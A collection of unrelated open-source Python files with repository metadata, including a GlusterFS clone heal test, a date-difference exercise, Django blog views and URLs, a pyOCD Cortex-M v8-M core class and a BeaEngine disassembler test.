g.log.info("Volume %s : All process are online", self.clone)
# wait for the heal process to complete
g.log.info("waiting for heal process to complete")
ret = monitor_heal_completion(self.mnode, self.volname)
self.assertTrue(ret, "Failed to complete the heal process")
g.log.info("Successfully completed heal process")
# Check areequal
# get the subvolumes
g.log.info("Starting to get sub-volumes for volume %s", self.clone)
subvols = get_subvols(self.mnode, self.clone)
num_subvols = len(subvols['volume_subvols'])
g.log.info("Number of subvolumes in volume %s:", num_subvols)
# Get arequals and compare
g.log.info("Starting to Compare areequals")
for i in range(0, num_subvols):
# Get arequal for first brick
subvol_brick_list = subvols['volume_subvols'][i]
node, brick_path = subvol_brick_list[0].split(':')
command = ('arequal-checksum -p %s '
'-i .glusterfs -i .landfill -i .trashcan'
% brick_path)
ret, arequal, _ = g.run(node, command)
first_brick_total = arequal.splitlines()[-1].split(':')[-1]
# Get arequal for every brick and compare with first brick
for brick in subvol_brick_list:
node, brick_path = brick.split(':')
command = ('arequal-checksum -p %s '
'-i .glusterfs -i .landfill -i .trashcan'
% brick_path)
ret, brick_arequal, _ = g.run(node, command)
self.assertFalse(ret,
'Failed to get arequal on brick %s'
% brick)
g.log.info('Getting arequal for %s is successful', brick)
brick_total = brick_arequal.splitlines()[-1].split(':')[-1]
self.assertEqual(first_brick_total, brick_total,
'Arequals for subvol and %s are not equal'
% brick)
g.log.info('Arequals for subvol and %s are equal', brick)
g.log.info('All arequals are equal for distributed-replicated')
def tearDown(self):
# Cleanup and umount cloned volume
g.log.info("Starting to umount Volume")
ret = umount_volume(self.clients[0], self.mount1)
if not ret:
raise ExecutionError("Failed to unmount the cloned volume")
g.log.info("Successfully Unmounted the cloned volume")
g.log.info("Starting to cleanup volume")
ret = cleanup_volume(self.mnode, self.clone)
if not ret:
raise ExecutionError("Failed to cleanup the cloned volume")
g.log.info("Successful in cleanup Cloned volume")
# Unmount and cleanup original volume
g.log.info("Starting to Unmount Volume and Cleanup Volume")
ret = self.unmount_volume_and_cleanup_volume(mounts=self.mounts)
if not ret:
raise ExecutionError("Failed to umount the vol & cleanup Volume")
g.log.info("Successful in umounting the volume and Cleanup")
| [
"vavuthu@redhat.com"
] | vavuthu@redhat.com |
51f98ecf9694b803c8e5a2691359a7e9a09e42c7 | 87f265520bec8db1a9c039a0860b6b824de40192 | /chapter_1/days_since_birth_udacity_simple.py | 3ece89083ead2fc6cc8afbf6276b21843f8d0194 | [] | no_license | vladcipariu91/DSA-Problems | 78b4edf467cc6565a6b4afdcb0356a28771a6319 | edd77b49e176cc0d7426b168f0fbc7b39d9fe10e | refs/heads/master | 2020-07-25T10:58:09.416339 | 2019-12-03T11:35:42 | 2019-12-03T11:35:42 | 208,266,039 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,185 | py | months = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
def daysBetweenDates(year1, month1, day1, year2, month2, day2):
"""
Calculates the number of days between two dates.
"""
assert not isBefore(year2, month2, day2,
year1, month1, day1)
days = 0
while isBefore(year1, month1, day1, year2, month2, day2):
year1, month1, day1 = nextDay(year1, month1, day1)
days += 1
return days
def isLeapYear(year):
if year % 4 != 0:
return False
elif year % 100 != 0:
return True
elif year % 400 != 0:
return False
else:
return True
def nextDay(year, month, day):
"""Simple version: assume every month has 30 days"""
if day < daysInMonth(year, month):
return year, month, day + 1
else:
if month == 12:
return year + 1, 1, 1
else:
return year, month + 1, 1
def daysInMonth(year, month):
daysInMonth = months[month - 1]
if month == 2 and isLeapYear(year):
daysInMonth += 1
return daysInMonth
def isBefore(year1, month1, day1,
year2, month2, day2):
if year1 < year2:
return True
elif year1 == year2:
if month1 < month2:
return True
elif month1 == month2:
return day1 < day2
else:
return False
else:
return False
def test_daysInMonth():
assert daysInMonth(2000, 2) == 29
assert daysInMonth(2001, 2) == 28
assert daysInMonth(2000, 1) == 31
def test_isLeapYear():
assert isLeapYear(2000)
assert not isLeapYear(1900)
assert isLeapYear(1992)
assert isLeapYear(1904)
def test_nextDay():
assert nextDay(2018, 9, 3) == (2018, 9, 4)
assert nextDay(2018, 12, 31) == (2019, 1, 1)
assert nextDay(2018, 11, 30) == (2018, 12, 1)
assert nextDay(2000, 2, 28) == (2000, 2, 29)
assert nextDay(2000, 2, 29) == (2000, 3, 1)
def test_isBefore():
assert isBefore(1991, 1, 1,
2019, 1, 1)
assert isBefore(1991, 1, 1,
1991, 1, 2)
assert not isBefore(1991, 1, 1,
1991, 1, 1)
assert isBefore(1991, 1, 3,
1991, 2, 1)
assert not isBefore(1992, 1, 3,
1991, 2, 1)
def test_DaysBetweenDates():
# test same day
assert (daysBetweenDates(2017, 12, 30,
2017, 12, 30) == 0)
# test adjacent days
assert (daysBetweenDates(2017, 12, 30,
2017, 12, 31) == 1)
# test new year
assert (daysBetweenDates(2017, 12, 30,
2018, 1, 1) == 2)
# test full year difference
assert (daysBetweenDates(2012, 6, 29,
2013, 6, 29) == 365)
assert (daysBetweenDates(1991, 1, 6,
2019, 9, 2) == 10466)
assert (daysBetweenDates(2012, 1, 1,
2013, 1, 1) == 366)
print("Congratulations! Your daysBetweenDates")
print("function is working correctly!")
test_daysInMonth()
test_isLeapYear()
test_nextDay()
test_isBefore()
test_DaysBetweenDates()
| [
"vladcipariu@gmail.com"
] | vladcipariu@gmail.com |
8b6a6763701c9c14489d228ec1dc94576dead621 | 7aca3c9447a56169dbc4cc5c547db2fee5b14dc6 | /sorted.py | 255791790dd2adc12bea7946ff5ce5cebcb2f5f0 | [] | no_license | oksanatsuverkalova/PythonProjects | b211afb887e4202b78d977b4964e74dce95ba117 | d5e552449dfa19471f136c214c84a7a08e9a4d69 | refs/heads/main | 2023-07-11T18:58:28.954678 | 2021-06-16T20:19:11 | 2021-06-16T20:19:11 | 331,691,241 | 0 | 1 | null | 2021-08-29T16:54:45 | 2021-01-21T16:46:31 | Python | UTF-8 | Python | false | false | 119 | py | numbers = [345, 465, 43, 1, 12, 214, 67, 4213, 2, 34, 77]
print(sorted(numbers))
print(sorted(numbers, reverse=True)) | [
"noreply@github.com"
] | oksanatsuverkalova.noreply@github.com |
75b317be1d1147754f7a1ef628a29805477c59a2 | a3b9ce8aa33c7ab62e7754edd11c63f84071ab68 | /blog/urls.py | 0728b5ae04ee9a2ea230944a08ba171e94a39eb3 | [] | no_license | dillipsingh99/simpleisbetter | b69bd48ef4e972832e30022bfdcc9138d2c05273 | daa08df121e7f77d5fae5ff2a8ec54d66dc5e7fe | refs/heads/master | 2023-08-14T00:20:50.098773 | 2021-10-09T13:16:11 | 2021-10-09T13:16:11 | 415,249,556 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 480 | py | from django.urls import path
from .views import (
blog_home,
blog_detail,
BlogCreateView,
BlogUpdateView,
BlogDeleteView,
)
urlpatterns = [
path('', blog_home, name='blog_home'),
path('<int:pk>/', blog_detail, name='blog_detail'),
path('create/', BlogCreateView.as_view(), name='blog_create'),
path('<int:pk>/update/', BlogUpdateView.as_view(), name='blog_update'),
path('<int:pk>/delete/', BlogDeleteView.as_view(), name='blog_delete'),
] | [
"dk381759@gmail.com"
] | dk381759@gmail.com |
305f691a749f474d814151a9c76c20b19583e32a | 1892e82be0786c806b26feeefff5d8f646794a8d | /app/seeds/bookings.py | 6329f41315e0ca372a0151ab6d0ccef7fca5119a | [] | no_license | akuemperSFDC/staybnb | a498af72af7c6821893bd702a5dc7094b17ce2e1 | d400892b939fba42111ded44671072b40234b6ae | refs/heads/main | 2023-07-24T16:47:20.423041 | 2021-09-03T19:19:11 | 2021-09-03T19:19:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 918 | py | from app.models import db, Booking
import datetime
def seed_bookings():
booking1 = Booking(listing_id=1, user_id=1, number_of_guests=1, start_date=datetime.datetime(2021, 8, 2).isoformat(), end_date=datetime.datetime(2021, 8, 6).isoformat())
booking2 = Booking(listing_id=2, user_id=1, number_of_guests=2, start_date=datetime.datetime(2021, 8, 7).isoformat(), end_date=datetime.datetime(2021, 8, 12).isoformat())
booking3 = Booking(listing_id=3, user_id=4, number_of_guests=3, start_date='2021-08-12', end_date='2021-08-18')
booking4 = Booking(listing_id=1, user_id=5, number_of_guests=4, start_date='2021-08-20', end_date='2021-08-21')
db.session.add(booking1)
db.session.add(booking2)
db.session.add(booking3)
db.session.add(booking4)
db.session.commit()
def undo_bookings():
db.session.execute('TRUNCATE bookings RESTART IDENTITY CASCADE;')
db.session.commit()
| [
"78562233+AKuemper@users.noreply.github.com"
] | 78562233+AKuemper@users.noreply.github.com |
4358c2ac0fce94cc9e60ee2222342c74169e8fed | b6f85dbed341fc33eba142e878096217a70b141f | /src/sce/model/factory_allow_labels.py | f302855667cf953e0757e00b9125ebe2edb14999 | [] | no_license | genimarca/senti_cross_embeddings | 8a08c5854ebcfa63b566a7f6538e65a64fe73e1b | 435467b5362c301ec2e9b6a015aadcfd0ee3f797 | refs/heads/master | 2020-03-22T23:50:30.193464 | 2019-07-26T12:27:46 | 2019-07-26T12:27:46 | 140,831,055 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | #!/usr/bin/python3
# *-* coding:utf-8 *-*
'''
Created on 20 jul. 2018
@author: Eugenio Martínez Cámara
'''
from sce.model.allow_labels_names import AllowLabelsNames
class FactoryAllowLabels:
'''
classdocs
'''
@classmethod
def creator(cls, allow_labels_name_key):
cl = None
if allow_labels_name_key in AllowLabelsNames.__members__.keys():
allow_labels_class_path = AllowLabelsNames.__members__[allow_labels_name_key].value
allow_labels_class_fields = allow_labels_class_path.rsplit(".", 1)
module = __import__(allow_labels_class_fields[0], fromlist=allow_labels_class_fields[-1])
cl = getattr(module, allow_labels_class_fields[-1])()
return cl
| [
"genimarca@gmail.com"
] | genimarca@gmail.com |
35034f6869f1b6b1f67c3c7e44d3ecd2dc7d11bb | ade88dc242e2e32a2a44d593f454657da4612dd8 | /CropAndSwap.py | 17ecf7942c62a6c736f9bff793085df9eed92bac | [] | no_license | sudeeproxx/Summer_Task4 | e879f9e9050e49bfb0b9eb4ab21ff4b20dd27db6 | fd7ed0c623e2c7e0715a6cc99fafc34effe023a1 | refs/heads/main | 2023-05-26T23:09:04.605622 | 2021-06-10T08:01:52 | 2021-06-10T08:01:52 | 375,614,689 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | import cv2
import numpy
image_1=cv2.imread("image1.jpg")
image_1.shape
crop1= image_1[48:129,102:183]
image_2=cv2.imread("image2.jpg")
image_2.shape
crop2= image_2[51:132,97:178]
swap1=image_1
swap2=image_2
#Now swap the cropped parts
#swap1[48:129,102:183]= crop2
#cv2.imshow("AfterSwap1",swap1)
#cv2.waitKey()
#cv2.destroyAllWindows()
swap2[51:132,97:178]= crop1
cv2.imshow("AfterSwap2",swap2)
cv2.waitKey()
cv2.destroyAllWindows()
| [
"noreply@github.com"
] | sudeeproxx.noreply@github.com |
a67b54086452c10f1e12e07bfbdab64f99c5c8ee | 7eab0c659bb033dd8e44764884c905df5c1c7962 | /case/setjymima.py | 41186c06ef52eb1d68fe4b1293834fca138d03ae | [] | no_license | pengqiuli/app-python | 63fd210f2dae04163d51b41ff0a21abde13d4cde | af9f64a80368f79c0292f69a1cdcfba4f5fbb8df | refs/heads/master | 2023-02-19T01:45:43.201350 | 2021-01-20T07:18:06 | 2021-01-20T07:18:06 | 324,941,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,657 | py | # -*-coding:utf-8-*-
from base.activity import *
from time import sleep
import unittest
class test(unittest.TestCase):
@classmethod
def setUpClass(cls):
# 启动app
cls.driver = desired_caps()
sleep(4)
cls.driver = jinrushouye(cls.driver)
cls.driver = mainpage(cls.driver)
log = login(cls.driver,"plm123","plm123")
sleep(6)
el = cls.driver.find_element_by_accessibility_id("交易密码\n设置").click()
def tearDownClass(cls):
pass
def test_setjymima_001(self):
# 交易密码为空
mima = setjymima(self.driver,"","123456")
sleep(1)
self.driver.get_screenshot_as_file(r'E:\images\test_setjymima_photo_01.png')
el2 = self.driver.find_element_by_xpath(
"/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.view.View/android.view.View/android.view.View/android.view.View/android.view.View[2]/android.view.View/android.view.View[1]/android.widget.EditText[2]/android.view.View[2]")
el2.click()
def test_setjymima_002(self):
# 确认交易密码为空
mima = setjymima(self.driver,"123456","")
sleep(1)
self.driver.get_screenshot_as_file(r'E:\images\test_setjymima_photo_02.png')
el1 = self.driver.find_element_by_xpath(
"/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.view.View/android.view.View/android.view.View/android.view.View/android.view.View[2]/android.view.View/android.view.View[1]/android.widget.EditText[1]/android.view.View[2]")
el1.click()
def test_setjymima_003(self):
# 两次交易密码不一致
mima = setjymima(self.driver,"321654","123456")
sleep(1)
self.driver.get_screenshot_as_file(r'E:\images\test_setjymima_photo_03.png')
clear = setjymima_clear(self.driver)
def test_setjymima_004(self):
# 交易密码为5位
mima = setjymima(self.driver,"32165","32165")
sleep(1)
self.driver.get_screenshot_as_file(r'E:\images\test_setjymima_photo_04.png')
clear1 = setjymima_clear(self.driver)
# def test_setjymima_005(self):
# # 交易密码符合规范
# mima = setjymima(self.driver,"321654","321654")
# sleep(1)
# self.driver.get_screenshot_as_file(r'E:\images\test_setjymima_photo_05.png')
# clear2 = setjymima_clear(self.driver)
if __name__ == "__main__":
unittest.main()
| [
"1151853956@qq.com"
] | 1151853956@qq.com |
f8f7e6aff74349c59cce9401e12149fb28ed8f8b | 208bc8b87cb20fc6e57c8c8846cbe947b2eec1f3 | /pyocd/coresight/cortex_m_v8m.py | ca01e71819f240e6e35497dc4209539e8afd50ac | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | canerbulduk/pyOCD | 28c545f25ef9b2949a1cd49c00faeeda986a26fe | a61e8b8dc2050309510d9fe7ca63680aafe06749 | refs/heads/main | 2023-08-24T21:10:52.427697 | 2021-11-09T15:13:48 | 2021-11-09T15:13:48 | 426,275,463 | 0 | 0 | Apache-2.0 | 2021-11-09T15:08:22 | 2021-11-09T15:08:21 | null | UTF-8 | Python | false | false | 7,538 | py | # pyOCD debugger
# Copyright (c) 2019-2020 Arm Limited
# Copyright (c) 2021 Chris Reed
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from .cortex_m import CortexM
from .core_ids import (CORE_TYPE_NAME, CoreArchitecture, CortexMExtension)
from ..core.target import Target
from .cortex_m_core_registers import CoreRegisterGroups
LOG = logging.getLogger(__name__)
class CortexM_v8M(CortexM):
"""! @brief Component class for a v8.x-M architecture Cortex-M core."""
ARMv8M_BASE = 0xC
ARMv8M_MAIN = 0xF
## DFSR.PMU added in v8.1-M.
DFSR_PMU = (1 << 5)
DSCSR = 0xE000EE08
DSCSR_CDSKEY = 0x00020000
DSCSR_CDS = 0x00010000
DSCSR_SBRSEL = 0x00000002
DSCSR_SBRSELEN = 0x00000001
# Processor Feature Register 1
PFR1 = 0xE000ED44
PFR1_SECURITY_MASK = 0x000000f0
PFR1_SECURITY_SHIFT = 4
PFR1_SECURITY_EXT_V8_0 = 0x1 # Base security extension.
PFR1_SECURITY_EXT_V8_1 = 0x3 # v8.1-M adds several instructions.
# Media and FP Feature Register 1
MVFR1 = 0xE000EF44
MVFR1_MVE_MASK = 0x00000f00
MVFR1_MVE_SHIFT = 8
MVFR1_MVE__INTEGER = 0x1
MVFR1_MVE__FLOAT = 0x2
def __init__(self, rootTarget, ap, memory_map=None, core_num=0, cmpid=None, address=None):
super(CortexM_v8M, self).__init__(rootTarget, ap, memory_map, core_num, cmpid, address)
# Only v7-M supports VECTRESET.
self._supports_vectreset = False
@property
def supported_security_states(self):
"""! @brief Tuple of security states supported by the processor.
@return Tuple of @ref pyocd.core.target.Target.SecurityState "Target.SecurityState". The
result depends on whether the Security extension is enabled.
"""
if self.has_security_extension:
return (Target.SecurityState.NONSECURE, Target.SecurityState.SECURE)
else:
return (Target.SecurityState.NONSECURE,)
def _read_core_type(self):
"""! @brief Read the CPUID register and determine core type and architecture."""
# Read CPUID register
cpuid = self.read32(CortexM.CPUID)
implementer = (cpuid & CortexM.CPUID_IMPLEMENTER_MASK) >> CortexM.CPUID_IMPLEMENTER_POS
if implementer != CortexM.CPUID_IMPLEMENTER_ARM:
LOG.warning("CPU implementer is not ARM!")
arch = (cpuid & CortexM.CPUID_ARCHITECTURE_MASK) >> CortexM.CPUID_ARCHITECTURE_POS
self.core_type = (cpuid & CortexM.CPUID_PARTNO_MASK) >> CortexM.CPUID_PARTNO_POS
self.cpu_revision = (cpuid & CortexM.CPUID_VARIANT_MASK) >> CortexM.CPUID_VARIANT_POS
self.cpu_patch = (cpuid & CortexM.CPUID_REVISION_MASK) >> CortexM.CPUID_REVISION_POS
pfr1 = self.read32(self.PFR1)
pfr1_sec = ((pfr1 & self.PFR1_SECURITY_MASK) >> self.PFR1_SECURITY_SHIFT)
self.has_security_extension = pfr1_sec in (self.PFR1_SECURITY_EXT_V8_0, self.PFR1_SECURITY_EXT_V8_1)
if self.has_security_extension:
self._extensions.append(CortexMExtension.SEC)
if pfr1_sec == self.PFR1_SECURITY_EXT_V8_1:
self._extensions.append(CortexMExtension.SEC_V81)
if arch == self.ARMv8M_BASE:
self._architecture = CoreArchitecture.ARMv8M_BASE
else:
self._architecture = CoreArchitecture.ARMv8M_MAIN
if self.core_type in CORE_TYPE_NAME:
if self.has_security_extension:
LOG.info("CPU core #%d is %s r%dp%d (security ext present)", self.core_number, CORE_TYPE_NAME[self.core_type], self.cpu_revision, self.cpu_patch)
else:
LOG.info("CPU core #%d is %s r%dp%d", self.core_number, CORE_TYPE_NAME[self.core_type], self.cpu_revision, self.cpu_patch)
else:
LOG.warning("CPU core #%d type is unrecognized", self.core_number)
def _check_for_fpu(self):
"""! @brief Determine if a core has an FPU.
In addition to the tests performed by CortexM, this method tests for the MVE extension.
"""
super(CortexM_v8M, self)._check_for_fpu()
# Check for MVE.
mvfr1 = self.read32(self.MVFR1)
mve = (mvfr1 & self.MVFR1_MVE_MASK) >> self.MVFR1_MVE_SHIFT
if mve == self.MVFR1_MVE__INTEGER:
self._extensions.append(CortexMExtension.MVE)
elif mve == self.MVFR1_MVE__FLOAT:
self._extensions += [CortexMExtension.MVE, CortexMExtension.MVE_FP]
def _build_registers(self):
super(CortexM_v8M, self)._build_registers()
# Registers available with Security extension, either Baseline or Mainline.
if self.has_security_extension:
self._core_registers.add_group(CoreRegisterGroups.V8M_SEC_ONLY)
# Mainline-only registers.
if self.architecture == CoreArchitecture.ARMv8M_MAIN:
self._core_registers.add_group(CoreRegisterGroups.V7M_v8M_ML_ONLY)
# Registers available when both Mainline and Security extensions are implemented.
if self.has_security_extension:
self._core_registers.add_group(CoreRegisterGroups.V8M_ML_SEC_ONLY)
# MVE registers.
if CortexMExtension.MVE in self.extensions:
self._core_registers.add_group(CoreRegisterGroups.V81M_MVE_ONLY)
def get_security_state(self):
"""! @brief Returns the current security state of the processor.
@return @ref pyocd.core.target.Target.SecurityState "Target.SecurityState" enumerator.
"""
dscsr = self.read32(self.DSCSR)
if (dscsr & self.DSCSR_CDS) != 0:
return Target.SecurityState.SECURE
else:
return Target.SecurityState.NONSECURE
def clear_debug_cause_bits(self):
self.write32(CortexM.DFSR,
self.DFSR_PMU
| CortexM.DFSR_EXTERNAL
| CortexM.DFSR_VCATCH
| CortexM.DFSR_DWTTRAP
| CortexM.DFSR_BKPT
| CortexM.DFSR_HALTED)
def get_halt_reason(self):
"""! @brief Returns the reason the core has halted.
This overridden version of this method adds support for v8.x-M halt reasons.
@return @ref pyocd.core.target.Target.HaltReason "Target.HaltReason" enumerator or None.
"""
dfsr = self.read32(self.DFSR)
if dfsr & self.DFSR_HALTED:
reason = Target.HaltReason.DEBUG
elif dfsr & self.DFSR_BKPT:
reason = Target.HaltReason.BREAKPOINT
elif dfsr & self.DFSR_DWTTRAP:
reason = Target.HaltReason.WATCHPOINT
elif dfsr & self.DFSR_VCATCH:
reason = Target.HaltReason.VECTOR_CATCH
elif dfsr & self.DFSR_EXTERNAL:
reason = Target.HaltReason.EXTERNAL
elif dfsr & self.DFSR_PMU:
reason = Target.HaltReason.PMU
else:
reason = None
return reason
| [
"flit@me.com"
] | flit@me.com |
9ecf378f5d3e1aa424496b98922212a95c491601 | 68eb8913b251e711ba146097b08fde79fe6dc66f | /hier/views.py | 510353afa579c80ac36f7defd9dbbdc3115374ad | [] | no_license | youhyun97/invisible_Beta | 76003c6be1e753731d5e1f0809830be4f551395f | 896e707894efd9d5a1cbf8e9d8c614863ac000ab | refs/heads/master | 2020-06-29T22:08:21.212238 | 2019-08-05T10:54:31 | 2019-08-05T10:54:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,010 | py | from django.shortcuts import render, get_object_or_404, redirect
from invi_app.models import Lecture, Lecturefeature, Feature, Lectureteacher
##################################
def home(request):
lecture = Lecture.objects.extra(tables=['lectureFeature'], where=['lectureFeature.lecture_id=lecture.lecture_id AND lectureFeature.feature_id is NULL'])
return render(request, 'home.html', {'lec_list': lecture})
##################################
def detail(request, lecture_id):
lec_detail = get_object_or_404(Lecture, pk=lecture_id)
#11까지 강의특징, 강의특징list
lec_feature = Feature.objects.filter(feature_id__lte=11)
#선생님 수
teacher_num = Lectureteacher.objects.extra(select=['count(teacher_id)'], tables=['lecture'], where=['lectureTeacher.lecture_id=lecture.lecture_id AND lecture.lecture_id =%s'], select_params=(lecture_id))
print(teacher_num)
#연합강좌면
#아니면
return render(request, 'detail.html', {'lec':lec_detail, 'lec_feature':lec_feature})
##################################
def save(request):
getlec = Lecture.objects.get(lecture_id=int(request.GET['lecID']))
getfeat = Feature.objects.get(feature_id=int(request.GET['lec_selec_1']))
#특징 저장을 시도
try:
#1번특징 저장
feature1 = Lecturefeature(lecture=getlec, feature=getfeat)
feature1.save()
getfeat = Feature.objects.get(feature_id=int(request.GET['lec_selec_2']))
#2번특징 저장
feature2 = Lecturefeature(lecture=getlec, feature=getfeat)
feature2.save()
#실패할 경우
except:
return redirect('/hier/')
#성공할 경우
else:
#NULL 제거
nullnull = Lecturefeature.objects.filter(lecture=getlec, feature__isnull=True).delete()
return redirect('/hier/')
##################################
'''
#TODO
#
# detail에 선생님 특징 출력
# url 앱 내로 옮기기
# restful하게 고치기
''' | [
"HyeyoungCho97@gmail.com"
] | HyeyoungCho97@gmail.com |
964be754ef86bec5917a57c625ad4ed6a31349f8 | dcafbc9a6eea2b0e9aabc527b93cd97d270a67af | /tests/test_cli.py | 1cc1282f4575e65d72cfcb43033f27022e631d72 | [
"MIT"
] | permissive | bfontaine/edt2ics | 83fbd51540d7887e049be90efb70f382110dafaf | 1245f174694c30a42c489d831970c32ae42c0b0d | refs/heads/master | 2021-05-15T01:55:46.595212 | 2015-01-05T11:31:48 | 2015-01-05T11:31:48 | 24,652,011 | 1 | 0 | MIT | 2021-03-23T09:20:53 | 2014-09-30T19:18:04 | Python | UTF-8 | Python | false | false | 1,722 | py | # -*- coding: UTF-8 -*-
import sys
from tempfile import NamedTemporaryFile
from os import remove
try:
import unittest2 as unittest
from cStringIO import StringIO
except ImportError:
from io import StringIO
import unittest
from edt2ics.cli import write_ical, main, ScheduleScraper
def ctrlC(self, *args, **kwargs):
raise KeyboardInterrupt
class TestCli(unittest.TestCase):
def setUp(self):
self.real_stdout = sys.stdout
self.stdout = sys.stdout = StringIO()
self.argv = sys.argv
self.sys_exit = sys.exit
self.exit_code = None
self.ss_init = ScheduleScraper.__init__
def _fake_exit(code=None):
self.exit_code = code
_fake_exit.__name__ = sys.exit.__name__
sys.exit = _fake_exit
def tearDown(self):
sys.stdout = self.real_stdout
sys.argv = self.argv
sys.exit = self.sys_exit
ScheduleScraper.__init__ = self.ss_init
# write_ical
def test_write_stdout(self):
s = u'foobarXz123$$9_=+@@'
write_ical(s, '-')
self.stdout.seek(0)
self.assertEquals(s, self.stdout.read())
def test_write_file(self):
s = u'foo&"b$**a-rXz12%x3ZZ$$9_=+@@'
file_ = NamedTemporaryFile(delete=False)
file_.close()
filename = file_.name
write_ical(s, filename)
with open(filename, 'r') as f:
self.assertEquals(s, f.read())
remove(filename)
# main
def test_main_abort_on_interrupt(self):
ScheduleScraper.__init__ = ctrlC
sys.argv = ['edt2ics', 'M2']
self.assertEquals(None, self.exit_code)
main()
self.assertEquals(1, self.exit_code)
| [
"batifon@yahoo.fr"
] | batifon@yahoo.fr |
4344d7b0f4c19f27896dd13ab0f65e65e0e64627 | 7f523c407d45d116860eff67f079e807f2b53339 | /src/third_party/beaengine/tests/0f46.py | 6ad6b5dec2522c38575bfec34ef1d56a52f05929 | [
"LGPL-3.0-only",
"LGPL-2.0-or-later",
"MIT"
] | permissive | 0vercl0k/rp | a352c96bfe3715eb9ce8c5942831123e65289dac | b24e7f58a594aaf0ce3771745bf06862f6ecc074 | refs/heads/master | 2023-08-30T08:03:14.842828 | 2023-08-09T00:41:00 | 2023-08-09T00:41:00 | 3,554,173 | 1,557 | 239 | MIT | 2023-08-09T00:41:02 | 2012-02-26T19:26:33 | C++ | UTF-8 | Python | false | false | 2,862 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
# @author : beaengine@gmail.com
from headers.BeaEnginePython import *
from nose.tools import *
class TestSuite:
def test(self):
# VEX.NDS.L1.0F.W0 46 /r
# kxnorW k1, k2, k3
myVEX = VEX('VEX.NDS.L1.0F.W0')
myVEX.vvvv = 0b1101
myVEX.R = 1
Buffer = bytes.fromhex('{}46cb'.format(myVEX.c4()))
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0x46')
assert_equal(myDisasm.infos.Reserved_.VEX.L, 1)
assert_equal(myDisasm.infos.Reserved_.REX.W_, 0)
assert_equal(myDisasm.infos.Reserved_.MOD_, 3)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'kxnorw')
assert_equal(myDisasm.repr(), 'kxnorw k1, k2, k3')
# VEX.L1.66.0F.W0 46 /r
# kxnorB k1, k2, k3
myVEX = VEX('VEX.L1.66.0F.W0')
myVEX.vvvv = 0b1101
myVEX.R = 1
Buffer = bytes.fromhex('{}46cb'.format(myVEX.c4()))
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0x46')
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'kxnorb')
assert_equal(myDisasm.repr(), 'kxnorb k1, k2, k3')
# VEX.L1.0F.W1 46 /r
# kxnorQ k1, k2, k3
myVEX = VEX('VEX.L1.0F.W1')
myVEX.vvvv = 0b1101
myVEX.R = 1
Buffer = bytes.fromhex('{}46cb'.format(myVEX.c4()))
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0x46')
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'kxnorq')
assert_equal(myDisasm.repr(), 'kxnorq k1, k2, k3')
# VEX.L1.66.0F.W1 46 /r
# kxnorD k1, k2, k3
myVEX = VEX('VEX.L1.66.0F.W1')
myVEX.vvvv = 0b1101
myVEX.R = 1
Buffer = bytes.fromhex('{}46cb'.format(myVEX.c4()))
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0x46')
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'kxnord')
assert_equal(myDisasm.repr(), 'kxnord k1, k2, k3')
| [
"noreply@github.com"
] | 0vercl0k.noreply@github.com |
8fbc353c04181575bc228c0842bd83b67d15cd1f | 1213345f1424ff4c0d08d61dde54670ee158099e | /Lektion5/Projekt/data_analyse_oevelse_1.py | da8423e65ef44a5f99090c0a5ba870954e1e63d9 | [] | no_license | victorduun/ITMAL | 62faf07555fb37add9c2f8d7bd7da6af103d6ff5 | 4e50d507f90e8719adad128ee4ba27b6539f4908 | refs/heads/master | 2023-01-31T07:42:43.622706 | 2020-12-11T11:54:41 | 2020-12-11T11:54:41 | 292,845,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | import matplotlib.pyplot as plt
from data_help import data_loader
data = data_loader.load_housing_data()
labels = data_loader.load_housing_labels()
median_income = data[:,7]
plt.hist(median_income, 30)
plt.show()
| [
"43340964+victorduun@users.noreply.github.com"
] | 43340964+victorduun@users.noreply.github.com |
